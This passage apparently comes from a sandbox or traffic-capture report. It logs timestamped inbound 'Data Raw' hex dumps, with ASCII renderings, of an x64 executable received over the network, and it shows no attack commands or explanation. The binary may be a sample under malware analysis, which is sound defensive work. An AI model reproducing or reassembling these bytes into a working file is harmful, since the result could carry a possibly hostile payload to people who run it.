06 41 0f af f7 03 f1 48 8b 03 40 8a 38 48 ff c0 48 89 03 eb 82 48 ff 0b 48 8b 03 40 84 ff 74 15 40 38 38 74 10 e8 c7 11 00 00 c7 00 16 00 00 00 e8 Data Ascii: AAtEuDEy>HHHHBtGEEDHHt8tvmA3AADOw!@;@9EDDHAHG<w@G<w@AA;t-A;s(EA;ru;vAAH@8HHHH@t@88t
2023-11-18 09:02:41 UTC	8720	IN	Data Raw: 73 1c e9 7f fe ff ff 66 3b 5c 24 64 73 08 0f b7 c3 41 2b c3 eb 03 83 c8 ff 83 f8 ff 75 29 8d 43 bf 66 83 f8 19 76 0e 8d 43 9f 66 83 f8 19 76 05 83 c8 ff eb 12 8d 43 9f 66 83 f8 19 0f b7 c3 77 03 83 e8 20 83 c0 c9 be 08 00 00 00 85 c0 74 0b 45 85 ff 75 55 44 8d 7e 02 eb 4f 48 8b 07 41 b8 df ff 00 00 0f b7 10 48 8d 48 02 48 89 0f 8d 42 a8 66 41 85 c0 74 69 45 85 ff 44 0f 44 fe 48 83 c1 fe 48 89 0f 66 85 d2 74 1b 66 39 11 74 16 e8 d2 0c 00 00 c7 00 16 00 00 00 e8 13 68 00 00 41 bb 10 ff 00 00 b9 30 00 00 00 4d 63 d7 33 d2 48 83 c8 ff 41 bd 60 06 00 00 49 f7 f2 41 bc f0 06 00 00 4c 8b c8 66 3b d9 0f 82 d4 01 00 00 66 83 fb 3a 73 2b 44 0f b7 c3 44 2b c1 e9 bc 01 00 00 0f b7 19 b8 10 00 00 00 45 85 ff 44 0f 44 f8 48 8d 41 02 48 89 07 eb ad be 08 00 00 00 eb ab Data Ascii: sf;\$dsA+u)CfvCfvCfw tEuUD~OHAHHHBfAtiEDDHHftf9thA0Mc3HA`IALf;f:s+DD+EDDHAH
2023-11-18 09:02:41 UTC	8721	IN	Data Raw: 01 c3 cc cc cc 48 8b c4 48 89 58 18 55 56 57 41 54 41 55 41 56 41 57 48 83 ec 70 33 db 0f 29 70 b8 0f 29 78 a8 48 ba ff ff ff ff ff ff ff 7f 44 0f 29 40 98 49 ba 00 00 00 00 00 00 f0 7f 44 0f 29 48 88 41 bb ff 07 00 00 f2 0f 11 8c 24 b0 00 00 00 44 8b cb 4c 8b b4 24 b0 00 00 00 44 8b c3 f2 0f 11 84 24 b0 00 00 00 49 8b c6 4c 8b bc 24 b0 00 00 00 48 23 c2 49 8b cf 44 0f 29 54 24 20 48 23 ca 4d 8b e6 49 c1 ec 34 48 ba 00 00 00 00 00 00 00 80 45 23 e3 4d 8b ef 49 c1 ed 34 49 8b ee 48 23 ea 45 23 eb 49 8b f7 41 8b fd 48 23 f2 44 0f 28 c9 48 85 c0 8b d3 44 0f 28 c0 0f 94 c2 49 3b c2 41 0f 94 c1 49 3b ca 44 89 8c 24 b8 00 00 00 41 0f 94 c0 41 2b fc 44 89 84 24 b0 00 00 00 49 3b c2 76 0d 49 8b ce e8 2f 59 00 00 e9 31 06 00 00 49 3b ca 76 05 49 8b cf eb ec 48 85 Data Ascii: HHXUVWATAUAVAWHp3)p)xHD)@ID)HA$DL$D$IL$H#ID)T$ H#MI4HE#MI4IH#E#IAH#D(HD(I;AI;D$AA+D$I;vI/Y1I;vIH
2023-11-18 09:02:41 UTC	8723	IN	Data Raw: f2 0f 10 94 24 b0 00 00 00 f2 0f 5c ca f2 0f 59 e0 0f 28 c2 f2 0f 59 c6 f2 0f 59 ce 0f 28 dc f2 0f 59 f4 f2 0f 5c d8 f2 0f 58 f5 f2 0f 5c d9 f2 0f 10 0d 0d d2 14 00 f2 0f 5e de 0f 28 d3 0f 28 eb f2 0f 59 d3 f2 0f 58 ef 0f 28 c2 f2 0f 59 05 e0 d1 14 00 f2 0f 5c c8 f2 0f 59 ca f2 0f 59 cb f2 0f 5c e9 e9 02 01 00 00 f2 0f 10 05 03 fd 16 00 45 0f 57 d2 66 0f 2f c5 0f 87 ec 00 00 00 f2 44 0f 11 8c 24 b0 00 00 00 48 b9 00 00 00 00 ff ff ff ff 48 8b 84 24 b0 00 00 00 0f 28 e5 f2 0f 59 e5 48 23 c1 48 89 84 24 b0 00 00 00 f2 0f 10 9c 24 b0 00 00 00 41 0f 28 c9 f2 0f 5c cb f2 0f 11 ac 24 b0 00 00 00 48 8b 84 24 b0 00 00 00 48 23 c1 48 89 84 24 b0 00 00 00 f2 0f 10 94 24 b0 00 00 00 f2 0f 59 ca 0f 28 c2 f2 0f 59 c3 f2 44 0f 5c c0 0f 28 c5 f2 0f 5c c2 f2 44 0f 5c c1 Data Ascii: $\Y(YY(Y\X\^((YX(Y\YY\EWf/D$HH$(YH#H$$A(\$H$H#H$$Y(YD\(\D\
2023-11-18 09:02:41 UTC	8724	IN	Data Raw: 38 85 c0 7f 05 4d 85 db 74 37 ff c8 33 d2 41 89 42 38 49 8b c3 48 f7 f3 80 c2 30 4c 8b d8 80 fa 39 7e 12 41 8a c1 f6 d8 1a c9 80 e1 e0 80 c1 61 80 e9 3a 02 d1 49 8b 42 48 88 10 49 ff 4a 48 eb bc 45 2b 42 48 49 ff 42 48 48 8b 5c 24 08 45 89 42 50 c3 48 89 5c 24 08 45 33 db 48 8b d9 45 85 c0 7e 45 4c 8b 13 49 8b 42 08 49 39 42 10 75 12 41 80 7a 18 00 74 05 41 ff 01 eb 1e 41 83 09 ff eb 18 41 ff 01 48 8b 03 48 ff 40 10 48 8b 03 48 8b 08 88 11 48 8b 03 48 ff 00 41 83 39 ff 74 08 41 ff c3 45 3b d8 7c bb 48 8b 5c 24 08 c3 cc 40 53 48 83 ec 20 48 8b d9 33 c9 48 89 0b 48 89 4b 08 48 89 4b 18 48 89 4b 20 48 89 4b 10 48 89 4b 28 48 89 4b 30 89 4b 38 66 89 4b 40 89 4b 50 88 4b 54 48 89 8b 58 04 00 00 48 89 8b 60 04 00 00 48 8b 02 48 89 83 68 04 00 00 48 8b 44 24 50 Data Ascii: 8Mt73AB8IH0L9~Aa:IBHIJHE+BHIBHH\$EBPH\$E3HE~ELIBI9BuAztAAAHH@HHHHA9tAE;\|H\$@SH H3HHKHKHK HKHK(HK0K8fK@KPKTHXH`HHhHD$P
2023-11-18 09:02:41 UTC	8726	IN	Data Raw: 08 0f 85 43 01 00 00 c7 41 2c 08 00 00 00 e8 ef f7 ff ff c7 00 16 00 00 00 e8 30 53 00 00 32 c0 e9 27 01 00 00 83 79 3c 00 75 e3 3c 49 0f 84 ba 00 00 00 3c 4c 0f 84 a9 00 00 00 3c 54 0f 84 98 00 00 00 3c 68 74 72 3c 6a 74 62 3c 6c 74 36 3c 74 74 26 3c 77 74 16 3c 7a b0 01 0f 85 eb 00 00 00 c7 41 3c 06 00 00 00 e9 df 00 00 00 c7 41 3c 0c 00 00 00 e9 d1 00 00 00 c7 41 3c 07 00 00 00 e9 c5 00 00 00 48 8b 41 18 80 38 6c 75 13 48 ff c0 c7 41 3c 04 00 00 00 48 89 41 18 e9 a9 00 00 00 c7 41 3c 03 00 00 00 e9 9d 00 00 00 c7 41 3c 05 00 00 00 e9 91 00 00 00 48 8b 41 18 80 38 68 75 10 48 ff c0 c7 41 3c 01 00 00 00 48 89 41 18 eb 78 c7 41 3c 02 00 00 00 eb 6f c7 41 3c 0d 00 00 00 eb 66 c7 41 3c 08 00 00 00 eb 5d 48 8b 51 18 8a 02 3c 33 75 17 80 7a 01 32 75 11 48 8d Data Ascii: CA,0S2'y<u<I<L<T<htr<jtb<lt6<tt&<wt<zA<A<A<HA8luHA<HAA<A<HA8huHA<HAxA<oA<fA<]HQ<3uz2uH
2023-11-18 09:02:41 UTC	8727	IN	Data Raw: 03 0f be 4b 41 48 0f 44 d7 48 89 44 24 38 8b 43 38 89 44 24 30 89 4c 24 28 48 8d 4c 24 60 4c 89 4c 24 20 4d 8b ca e8 9e 88 00 00 8b 43 30 c1 e8 05 a8 01 74 13 83 7b 38 00 75 0d 48 8b 53 08 48 8b 4b 48 e8 31 f6 ff ff 8a 43 41 2c 47 a8 df 75 6d 8b 43 30 c1 e8 05 a8 01 75 63 48 8b 43 08 48 8b 53 48 48 8b 08 48 8b 81 f8 00 00 00 48 8b 08 44 8a 01 eb 08 41 3a c0 74 09 48 ff c2 8a 02 84 c0 75 f2 8a 02 48 ff c2 84 c0 74 32 eb 09 2c 45 a8 df 74 09 48 ff c2 8a 02 84 c0 75 f1 48 8b ca 48 ff ca 80 3a 30 74 f8 44 38 02 75 03 48 ff ca 8a 01 48 ff c2 48 ff c1 88 02 84 c0 75 f2 48 8b 43 48 80 38 2d 75 0b 83 4b 30 40 48 ff c0 48 89 43 48 48 8b 53 48 8a 02 2c 49 3c 25 77 14 48 b9 21 00 00 00 21 00 00 00 48 0f a3 c1 73 04 c6 43 41 73 48 83 c9 ff 48 ff c1 80 3c 0a 00 75 f7 Data Ascii: KAHDHD$8C8D$0L$(HL$`LL$ MC0t{8uHSHKH1CA,GumC0ucHCHSHHHHDA:tHuHt2,EtHuHH:0tD8uHHHuHCH8-uK0@HHCHHSH,I<%wH!!HsCAsHH<u
2023-11-18 09:02:41 UTC	8728	IN	Data Raw: 3b 7b 50 75 ab eb 27 83 4b 28 ff eb 21 48 8b 43 10 4c 8d 49 28 44 8b 43 50 48 81 c1 68 04 00 00 48 8b 53 48 48 89 44 24 20 e8 22 00 00 00 b0 01 48 8b 4c 24 40 48 33 cc e8 7b 83 ff ff 48 8b 5c 24 68 48 8b 74 24 70 48 83 c4 50 5f c3 cc cc cc 48 8b c4 48 89 58 08 48 89 68 10 48 89 70 18 48 89 78 20 41 54 41 56 41 57 48 83 ec 20 48 8b 7c 24 60 4c 8b f9 49 8b d9 49 63 e8 44 8b 37 83 27 00 48 8b 09 48 8b 41 08 48 39 41 10 75 11 80 79 18 00 74 05 41 01 29 eb 45 41 83 09 ff eb 3f 48 2b 41 10 48 8b f5 48 8b 09 48 3b c5 48 0f 42 f0 4c 8b c6 e8 00 92 ff ff 49 8b 07 48 01 30 49 8b 07 48 01 70 10 49 8b 07 80 78 18 00 74 04 01 2b eb 0c 48 3b f5 74 05 83 0b ff eb 02 01 33 83 3f 00 75 08 45 85 f6 74 03 44 89 37 48 8b 5c 24 40 48 8b 6c 24 48 48 8b 74 24 50 48 8b 7c 24 58 Data Ascii: ;{Pu'K(!HCLI(DCPHhHSHHD$ "HL$@H3{H\$hHt$pHP_HHXHhHpHx ATAVAWH H\|$`LIIcD7'HHAH9AuytA)EA?H+AHHH;HBLIH0IHpIxt+H;t3?uEtD7H\$@Hl$HHt$PH\|$X
2023-11-18 09:02:41 UTC	8730	IN	Data Raw: 0f 28 c8 f2 0f 58 0d ac ba 14 00 f2 0f 58 05 94 ba 14 00 48 83 c4 38 c3 0f 1f 80 00 00 00 00 66 0f ef c0 48 83 c4 38 c3 0f 1f 80 00 00 00 00 48 83 c4 38 c3 66 66 66 0f 1f 84 00 00 00 00 00 c5 fb c2 15 07 ba 14 00 02 c5 fb c2 1d 06 ba 14 00 05 c5 e0 54 d2 c5 f9 2e d2 7a 14 c5 f9 2e 05 ec b9 14 00 0f 87 06 01 00 00 e9 41 01 00 00 90 c4 e1 f9 7e c2 48 0f ba f2 3f 48 3b 15 2f ba 14 00 0f 86 09 01 00 00 c5 fb 59 0d d9 b9 14 00 c5 f9 e6 d1 c5 fa e6 ca c5 f9 7e d1 c5 f0 16 c9 c5 fa 7e c0 c4 e2 f9 98 0d 84 b9 14 00 c5 f1 7c d1 48 c7 c0 3f 00 00 00 23 c1 c1 f9 06 c5 f9 28 1d 1c b9 14 00 c4 e2 e9 a9 1d 23 b9 14 00 c4 e2 e9 a9 1d 4a b9 14 00 c4 e2 e9 a9 1d 21 b9 14 00 c4 e2 e9 a9 1d 28 b9 14 00 c5 eb 59 c2 c4 e2 e1 a9 c2 81 f9 02 fc ff ff 48 8d 15 32 f4 14 00 4c 8d Data Ascii: (XXH8fH8H8fffT.z.A~H?H;/Y~~\|H?#(#J!(YH2L
2023-11-18 09:02:41 UTC	8731	IN	Data Raw: 00 00 f2 0f 10 8c 24 90 00 00 00 f2 0f 58 8c 24 98 00 00 00 f2 0f 59 ca f2 0f 59 c8 f2 0f 58 cf f2 0f 5e f1 f2 0f 5c fe 4d 85 d2 74 07 0f 57 3d 72 df 16 00 0f 28 c7 0f 28 74 24 60 0f 28 7c 24 50 44 0f 28 44 24 40 48 83 c4 78 c3 cc cc cc cc cc cc cc cc cc cc 48 81 ec d8 00 00 00 66 0f 7f b4 24 90 00 00 00 66 0f 7f bc 24 a0 00 00 00 83 3d ac f1 18 00 00 0f 85 1b 0c 00 00 66 66 0f 1f 84 00 00 00 00 00 f2 0f 11 44 24 20 f2 0f 11 4c 24 30 48 8b 54 24 20 4c 8b 44 24 30 4c 8b 15 db b7 14 00 4d 23 d0 0f 84 4a 07 00 00 4c 3b 05 bb b7 14 00 0f 84 8d 07 00 00 4c 8b 0d 86 b7 14 00 4c 23 ca 48 8b 05 ac b7 14 00 48 89 44 24 50 4c 3b 0d 70 b7 14 00 0f 84 ea 04 00 00 48 3b 15 8b b7 14 00 0f 84 cd 06 00 00 48 3b 15 86 b7 14 00 0f 84 80 08 00 00 4c 8b 0d 59 b7 14 00 4c 23 Data Ascii: $X$YYX^\MtW=r((t$`(\|$PD(D$@HxHf$f$=ffD$ L$0HT$ LD$0LM#JL;LL#HHD$PL;pH;H;LYL#
2023-11-18 09:02:41 UTC	8732	IN	Data Raw: 66 66 66 66 66 0f 1f 84 00 00 00 00 00 4c 8b 1d e9 b3 14 00 4c 0b 5c 24 50 e9 cf 05 00 00 66 66 66 66 66 66 66 0f 1f 84 00 00 00 00 00 66 0f eb 15 48 b4 14 00 f2 0f 5c 15 40 b4 14 00 f2 0f 10 ea 66 0f db 15 d4 b3 14 00 66 49 0f 7e d0 66 0f 73 d5 34 66 0f fa 2d c2 b4 14 00 f3 0f e6 f5 e9 b5 fb ff ff 66 0f 1f 84 00 00 00 00 00 4c 8b 15 89 b2 14 00 4d 23 d0 4c 3b 15 5f b2 14 00 0f 8f 49 03 00 00 4c 8b 15 9a b2 14 00 4d 23 d0 4d 8b da 48 8b 0d cd b2 14 00 49 d3 ea 4c 2b 15 cb b2 14 00 0f 88 d5 02 00 00 48 8b 05 76 b2 14 00 48 23 c2 48 89 44 24 60 49 8b ca 4c 3b 15 bc b2 14 00 7f 2e 4c 8b 0d bb b2 14 00 49 d3 e9 4d 23 cb 0f 85 a7 02 00 00 4c 8b 0d b0 b2 14 00 49 d3 e9 4d 23 cb 74 0c 48 8b 05 01 b2 14 00 48 89 44 24 50 48 3b 15 65 b2 14 00 0f 84 1f 03 00 00 48 Data Ascii: fffffLL\$PffffffffH\@ffI~fs4f-fLM#L;_ILM#MHIL+HvH#HD$`IL;.LIM#LIM#tHHD$PH;eH
2023-11-18 09:02:41 UTC	8734	IN	Data Raw: e9 b8 f9 ff ff 66 66 66 66 66 66 66 0f 1f 84 00 00 00 00 00 4d 33 db 4c 8b 15 76 ad 14 00 4d 23 d0 4c 0f 45 1d 8b ad 14 00 eb 29 66 0f 1f 84 00 00 00 00 00 4d 33 db 4c 8b 15 56 ad 14 00 4d 23 d0 4c 0f 44 1d 6b ad 14 00 66 66 66 0f 1f 84 00 00 00 00 00 48 33 c0 4d 8b c8 4c 8b 15 43 ad 14 00 4c 0b 0d 8c ad 14 00 4d 23 d0 4c 3b 15 32 ad 14 00 49 0f 44 c0 4c 8b 15 57 ad 14 00 4c 23 d0 4d 0f 45 d9 0f 85 aa 00 00 00 48 85 c0 75 45 0f 1f 44 00 00 44 8b 0d d1 ac 14 00 4c 85 1d 2a ad 14 00 44 0f 45 0d ca ac 14 00 f2 0f 10 44 24 20 f2 0f 10 4c 24 30 66 49 0f 6e d3 e8 74 74 00 00 e9 f8 f8 ff ff 66 66 66 66 66 66 66 0f 1f 84 00 00 00 00 00 66 49 0f 6e c3 e9 df f8 ff ff 66 0f 1f 44 00 00 48 33 c0 4c 8b 15 b6 ac 14 00 4d 23 d0 4c 3b 15 ac ac 14 00 49 0f 44 c0 4c 8b 15 Data Ascii: fffffffM3LvM#LE)fM3LVM#LDkfffH3MLCLM#L;2IDLWL#MEHuEDDL*DED$ L$0fInttffffffffInfDH3LM#L;IDL
2023-11-18 09:02:41 UTC	8735	IN	Data Raw: a9 14 00 0f 83 c2 00 00 00 c5 f9 56 05 ba ba 14 00 c5 f9 56 44 24 50 eb b9 66 90 41 8b c9 45 33 db c5 f9 2f 05 a2 a9 14 00 44 0f 43 d9 44 3b 1d 87 ba 14 00 75 15 c5 fb 59 44 24 40 c5 f9 56 44 24 50 eb 8e 0f 1f 80 00 00 00 00 4d 33 c0 48 3b 15 a6 ba 14 00 49 c7 c1 01 00 00 00 7f 2d 81 c1 32 04 00 00 49 0f 48 c8 49 d3 e1 49 8b c9 48 89 4c 24 40 c5 fb 59 44 24 40 c5 f9 56 44 24 50 e9 37 06 00 00 0f 1f 80 00 00 00 00 c5 fb 10 05 58 ba 14 00 c5 f9 56 44 24 50 e9 1d 06 00 00 66 66 66 66 66 0f 1f 84 00 00 00 00 00 4c 8b 1d 29 ba 14 00 4c 0b 5c 24 50 e9 cf 04 00 00 66 66 66 66 66 66 66 0f 1f 84 00 00 00 00 00 4c 8b 1d 79 a8 14 00 4c 0b 5c 24 50 e9 af 04 00 00 66 66 66 66 66 66 66 0f 1f 84 00 00 00 00 00 c5 e9 eb 15 d8 a8 14 00 c5 eb 5c 15 d0 a8 14 00 c5 f9 28 ea Data Ascii: VVD$PfAE3/DCD;uYD$@VD$PM3H;I-2IHIIHL$@YD$@VD$P7XVD$PfffffL)L\$PfffffffLyL\$Pfffffff\(
2023-11-18 09:02:41 UTC	8736	IN	Data Raw: 0b 0d 3c a3 14 00 4d 23 d0 4c 3b 15 e2 a2 14 00 49 0f 44 c0 4c 8b 15 07 a3 14 00 4c 23 d0 4d 0f 45 d9 0f 85 aa 00 00 00 48 85 c0 75 45 0f 1f 44 00 00 44 8b 0d 81 a2 14 00 4c 85 1d da a2 14 00 44 0f 45 0d 7a a2 14 00 c5 fb 10 44 24 20 c5 fb 10 4c 24 30 c4 c1 f9 6e d3 e8 24 6a 00 00 e9 16 fa ff ff 66 66 66 66 66 66 66 0f 1f 84 00 00 00 00 00 c4 c1 f9 6e c3 e9 fd f9 ff ff 66 0f 1f 44 00 00 48 33 c0 4c 8b 15 66 a2 14 00 4d 23 d0 4c 3b 15 5c a2 14 00 49 0f 44 c0 4c 8b 15 81 a2 14 00 4c 23 d0 75 5c c5 fb 10 44 24 20 c5 fb 10 4c 24 30 c4 c1 f9 6e d3 44 8b 0d ec a1 14 00 e8 bf 69 00 00 e9 b1 f9 ff ff 66 66 0f 1f 84 00 00 00 00 00 c5 fb 10 44 24 20 c5 fb 10 4c 24 30 c4 c1 f9 6e d3 44 8b 0d c4 a1 14 00 e8 93 69 00 00 e9 85 f9 ff ff 66 66 66 66 66 66 0f 1f 84 00 00 Data Ascii: <M#L;IDLL#MEHuEDDLDEzD$ L$0n$jfffffffnfDH3LfM#L;\IDLL#u\D$ L$0nDiffD$ L$0nDiffffff
2023-11-18 09:02:41 UTC	8738	IN	Data Raw: 0f 58 2d da c2 16 00 f2 0f 59 f0 0f 28 c2 f2 0f 59 e9 f2 0f 10 8c c1 d0 67 15 00 0f 28 f9 f2 41 0f 59 c8 f2 0f 59 fe f2 0f 59 c5 f2 0f 58 f8 f2 0f 58 f9 0f 28 cc f2 0f 59 cd f2 0f 58 fa 0f 28 d3 f2 0f 59 d6 f2 41 0f 59 d8 f2 0f 58 f9 f2 0f 58 fa f2 0f 58 fb f2 0f 58 fc 0f 28 c7 0f 28 74 24 70 0f 28 7c 24 60 44 0f 28 44 24 50 48 81 c4 80 00 00 00 5b c3 cc cc cc 48 83 ec 38 f2 0f 10 2d 5c c2 16 00 0f 28 e0 0f 29 74 24 20 0f 28 f0 0f 29 7c 24 10 0f 28 f9 f2 0f 59 e2 44 0f 29 04 24 44 0f 28 c3 66 0f 2f 25 b4 84 14 00 76 06 f2 0f 58 e5 eb 04 f2 0f 5c e5 f2 44 0f 2c c4 48 8d 15 94 4b ff ff 41 8b c8 83 e1 1f 48 63 c1 66 41 0f 6e c0 Data Ascii: X-Y(Yg(AYYYXX(YX(YAYXXXX((t$p(\|$`D(D$PH[H8-\()t$ ()\|$(YD)$D(f/%vX\D,HKAHcfAn
2023-11-18 09:02:42 UTC	8738	IN	Data Raw: f3 0f e6 c0 f2 0f 10 9c c2 a0 64 15 00 f2 0f 10 a4 c2 a0 65 15 00 41 8b c0 2b c1 f2 41 0f 59 c0 48 8b 4c 24 68 99 44 0f 28 04 24 83 e2 1f 03 c2 c1 f8 05 f2 0f 5c f0 89 01 48 8b 44 24 70 41 f7 d8 f2 0f 59 f1 66 41 0f 6e c8 f3 0f e6 c9 f2 0f 11 18 f2 0f 59 4c 24 60 48 8b 44 24 78 f2 0f 59 cf 0f 28 7c 24 10 0f 28 c1 f2 0f 58 c6 0f 28 d0 f2 0f 59 15 76 84 14 00 f2 0f 58 15 7e 84 14 00 f2 0f 59 d0 f2 0f 58 15 82 84 14 00 f2 0f 59 d0 f2 0f 58 15 86 84 14 00 f2 0f 59 d0 f2 0f 59 c0 f2 0f 58 d5 f2 0f 59 d0 0f 28 c4 f2 0f 58 c3 f2 0f 58 d1 f2 0f 58 d6 0f 28 74 24 20 f2 0f 59 d0 f2 0f 58 d4 f2 0f 11 10 48 83 c4 38 c3 cc 48 89 5c 24 08 57 48 83 ec 30 48 63 d9 e8 32 26 00 00 48 8b f8 48 85 c0 75 12 48 8d 05 f7 b5 14 00 48 8b 5c 24 40 48 83 c4 30 5f c3 48 83 78 78 00 Data Ascii: deA+AYHL$hD($\HD$pAYfAnYL$`HD$xY(\|$(X(YvX~YXYXYYXY(XXX(t$ YXH8H\$WH0Hc2&HHuHH\$@H0_Hxx
2023-11-18 09:02:42 UTC	8739	IN	Data Raw: 86 18 00 8b d7 83 e2 3f 8d 4b 40 2b ca 33 c0 48 d3 c8 48 33 c7 48 8b 0d a9 cf 18 00 48 3b c8 74 1a 48 33 f9 8b ca 48 d3 cf 48 8b cf ff 15 8b 6a 14 00 45 33 c0 33 d2 33 c9 ff d7 48 8d 0d c3 d0 18 00 eb 0c 41 3b df 75 0d 48 8d 0d cd d0 18 00 e8 04 0c 00 00 90 85 db 75 13 48 8d 15 cc 6a 14 00 48 8d 0d a5 6a 14 00 e8 80 fc ff ff 48 8d 15 c9 6a 14 00 48 8d 0d ba 6a 14 00 e8 6d fc ff ff 0f b6 05 46 cf 18 00 85 f6 41 0f 44 c7 88 05 3a cf 18 00 eb 06 e8 17 0e 00 00 90 b9 02 00 00 00 e8 fc 60 00 00 85 f6 75 09 41 8b ce e8 1c 00 00 00 cc 48 8b 5c 24 30 48 8b 74 24 38 48 8b 7c 24 40 4c 8b 74 24 48 48 83 c4 20 41 5f c3 40 53 48 83 ec 20 8b d9 e8 73 28 00 00 84 c0 74 28 65 48 8b 04 25 60 00 00 00 8b 90 bc 00 00 00 c1 ea 08 f6 c2 01 75 11 ff 15 4a 68 14 00 48 8b c8 8b Data Ascii: ?K@+3HH3HH;tH3HHjE333HA;uHuHjHjHjHjmFAD:`uAH\$0Ht$8H\|$@Lt$HH A_@SH s(t(eH%`uJhH
2023-11-18 09:02:42 UTC	8740	IN	Data Raw: 85 c0 75 2b 48 39 1d 89 cb 18 00 75 04 33 c0 eb 1e e8 22 00 00 00 85 c0 75 f3 e8 c5 01 00 00 48 8b 0d 66 cb 18 00 85 c0 48 0f 45 cb 48 8b c1 48 83 c4 20 5b c3 cc cc cc 48 89 5c 24 08 57 48 83 ec 20 33 ff 48 39 3d 41 cb 18 00 74 04 33 c0 eb 48 e8 b6 68 00 00 e8 f5 6c 00 00 48 8b d8 48 85 c0 75 05 83 cf ff eb 27 48 8b c8 e8 34 00 00 00 48 85 c0 75 05 83 cf ff eb 0e 48 89 05 23 cb 18 00 48 89 05 04 cb 18 00 33 c9 e8 f1 08 00 00 48 8b cb e8 e9 08 00 00 8b c7 48 8b 5c 24 30 48 83 c4 20 5f c3 48 89 5c 24 08 48 89 6c 24 10 48 89 74 24 18 57 41 56 41 57 48 83 ec 30 33 f6 4c 8b f1 8b d6 eb 1a 3c 3d 74 03 48 ff c2 48 83 c8 ff 48 ff c0 40 38 34 01 75 f7 48 ff c1 48 03 c8 8a 01 84 c0 75 e0 48 8d 4a 01 ba 08 00 00 00 e8 e5 09 00 00 48 8b d8 48 85 c0 74 6c 4c 8b f8 41 Data Ascii: u+H9u3"uHfHEHH [H\$WH 3H9=At3HhlHHu'H4HuH#H3HH\$0H _H\$Hl$Ht$WAVAWH03L<=tHHH@84uHHuHJHHtlLA
2023-11-18 09:02:42 UTC	8742	IN	Data Raw: 41 8b c8 4c 8b 4b 08 83 e1 3f 48 8b 5b 10 49 33 e8 4d 33 c8 48 d3 cd 49 33 d8 49 d3 c9 48 d3 cb 4c 3b cb 0f 85 c7 00 00 00 48 2b dd b8 00 02 00 00 48 c1 fb 03 48 3b d8 48 8b fb 48 0f 47 f8 41 8d 44 24 e0 48 03 fb 48 0f 44 f8 48 3b fb 72 1f 45 8d 44 24 c8 48 8b d7 48 8b cd e8 7f 6c 00 00 33 c9 4c 8b f0 e8 bd 03 00 00 4d 85 f6 75 28 48 8d 7b 04 41 b8 08 00 00 00 48 8b d7 48 8b cd e8 5b 6c 00 00 33 c9 4c 8b f0 e8 99 03 00 00 4d 85 f6 0f 84 51 ff ff ff 4c 8b 05 dd 7a 18 00 4d 8d 0c de 41 8b c0 49 8d 1c fe 83 e0 3f 41 8b cc 2b c8 48 8b d6 48 d3 ca 48 8b c3 49 2b c1 49 33 d0 48 83 c0 07 49 8b ee 48 c1 e8 03 49 8b c9 4c 3b cb 48 0f 47 c6 48 85 c0 74 16 48 ff c6 48 89 11 48 8d 49 08 48 3b f0 75 f1 4c 8b 05 8b 7a 18 00 41 8b c0 41 8b cc 83 e0 3f 2b c8 49 8b 47 08 Data Ascii: ALK?H[I3M3HI3IHL;H+HH;HHGAD$HHDH;rED$HHl3LMu(H{AHH[l3LMQLzMAI?A+HHHI+I3HIHIL;HGHtHHHIH;uLzAA?+IG
2023-11-18 09:02:42 UTC	8743	IN	Data Raw: 00 00 cd 29 41 b8 01 00 00 00 ba 15 00 00 40 41 8d 48 02 e8 d2 0a 00 00 b9 03 00 00 00 e8 70 f1 ff ff cc cc cc cc 40 53 48 83 ec 20 4c 8b c2 48 8b d9 48 85 c9 74 0e 33 d2 48 8d 42 e0 48 f7 f3 49 3b c0 72 43 49 0f af d8 b8 01 00 00 00 48 85 db 48 0f 44 d8 eb 15 e8 f6 6c 00 00 85 c0 74 28 48 8b cb e8 d2 68 00 00 85 c0 74 1c 48 8b 0d ff c9 18 00 4c 8b c3 ba 08 00 00 00 ff 15 71 57 14 00 48 85 c0 74 d1 eb 0d e8 1d b1 ff ff c7 00 0c 00 00 00 33 c0 48 83 c4 20 5b c3 cc cc cc 40 53 48 83 ec 20 e8 c9 6c 00 00 8b d8 83 e3 3f e8 d9 6c 00 00 8b c3 48 83 c4 20 5b c3 cc cc cc 48 89 5c 24 18 48 89 74 24 20 57 48 83 ec 20 48 8b da 48 8b f9 e8 9a 6c 00 00 8b f0 89 44 24 38 8b cb f7 d1 81 c9 7f 80 ff ff 23 c8 23 fb 0b cf 89 4c 24 30 80 3d 7d 75 18 00 00 74 25 f6 c1 40 74 Data Ascii: )A@AHp@SH LHHt3HBHI;rCIHHDlt(HhtHLqWHt3H [@SH l?lH [H\$Ht$ WH HHlD$8##L$0=}ut%@t
2023-11-18 09:02:42 UTC	8744	IN	Data Raw: e9 48 83 e9 40 48 f7 d9 49 d3 e0 4d 0b c8 eb 29 66 0f 1f 84 00 00 00 00 00 48 f7 d9 49 8b c1 49 d3 e2 49 d3 e1 48 83 e9 40 48 f7 d9 48 d3 e8 4c 0b d0 49 d3 e8 4d 0b c8 90 49 81 c3 ff 03 00 00 49 0f ba f2 34 49 8b cb 4c 0b d2 48 c1 e1 34 4c 0b d1 66 49 0f 6e c2 66 0f 6f c8 66 0f 73 d1 1b 66 0f 73 f1 1b 66 0f 6f d0 f2 0f 5c d1 0f 16 c0 0f 16 d1 66 0f 6f 0d 9e 9e 14 00 66 0f 6f 1d a6 9e 14 00 66 0f 6f 25 ae 9e 14 00 48 33 c9 49 0f bd c9 48 83 e9 40 48 f7 d9 49 d3 e1 49 c1 e9 0c 48 83 c1 34 4c 2b d9 49 c1 e3 34 4c 0b ca 4d 0b cb 66 49 0f 6e e9 66 0f 59 c1 66 0f 59 e9 66 0f 59 da 66 0f 59 e2 0f 12 cb 0f 12 d4 f2 0f 5c c8 f2 0f 58 cb 0f 12 d8 f2 0f 58 ca f2 0f 58 dd f2 0f 58 cc f2 0f 58 cb 66 0f 6f d0 f2 0f 58 c1 f2 0f 5c d0 f2 0f 58 ca 48 8b 04 24 48 83 c4 18 Data Ascii: H@HIM)fHIIIH@HHLIMII4ILH4LfInfofsfsfo\fofofo%H3IH@HIIH4L+I4LMfInfYfYfYfY\XXXXXfoX\XH$H
